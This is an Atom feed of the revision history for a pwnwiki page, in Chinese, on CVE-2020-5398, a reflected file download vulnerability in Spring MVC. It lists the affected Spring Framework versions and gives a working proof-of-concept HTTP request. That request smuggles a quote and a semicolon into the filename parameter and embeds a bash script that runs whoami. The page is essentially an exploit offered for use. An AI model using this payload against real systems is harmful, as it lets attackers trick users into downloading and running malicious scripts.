https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-5398_Spring_MVC_%E5%8F%8D%E5%B0%84%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BC%89%E6%BC%8F%E6%B4%9E CVE-2020-5398 Spring MVC 反射文件下載漏洞 - Revision history 2026-04-07T21:34:59Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2020-5398_Spring_MVC_%E5%8F%8D%E5%B0%84%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BC%89%E6%BC%8F%E6%B4%9E&diff=1875&oldid=prev Pwnwiki: 建立內容為「==漏洞影響== Spring Framework 5.2.0 to 5.2.2,5.1.0 to 5.1.12,5.0.0 to 5.0.15 ==POC== <pre> GET /?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Awh…」的新頁面 2021-04-23T00:50:54Z <p>建立內容為「==漏洞影響== Spring Framework 5.2.0 to 5.2.2,5.1.0 to 5.1.12,5.0.0 to 5.0.15 ==POC== &lt;pre&gt; GET /?filename=sample.sh%22%3B&amp;contents=%23!%2Fbin%2Fbash%0Awh…」的新頁面</p> <p><b>New page</b></p><div>==漏洞影響==<br /> Spring Framework 5.2.0 to 5.2.2,5.1.0 to 5.1.12,5.0.0 to 5.0.15<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> GET /?filename=sample.sh%22%3B&amp;contents=%23!%2Fbin%2Fbash%0Awhoami%27%20--dump-header%20- HTTP/1.1 Host: 192.168.248.129:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1<br /> &lt;/pre&gt;</div> Pwnwiki